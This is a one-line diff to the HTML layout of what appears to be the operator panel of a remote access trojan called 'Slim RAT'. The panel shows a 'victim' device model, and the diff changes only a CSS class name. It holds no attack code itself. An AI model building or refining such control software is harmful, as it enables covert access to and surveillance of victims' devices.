--- a/app/lab.html
+++ b/app/lab.html
@@ -26,7 +26,7 @@
         <div class="left">
           <img class="logo" src="assets/images/logo.png" alt="Slim RAT">
         </div>
-        <ul class="right mr15">
+        <ul class="right right-15">
           <li><span class="device" ng-bind="victim.model"></span></li>
           <li><a ng-click="close();"><i class="material-icons">arrow_forward</i></a></li>
         </ul>
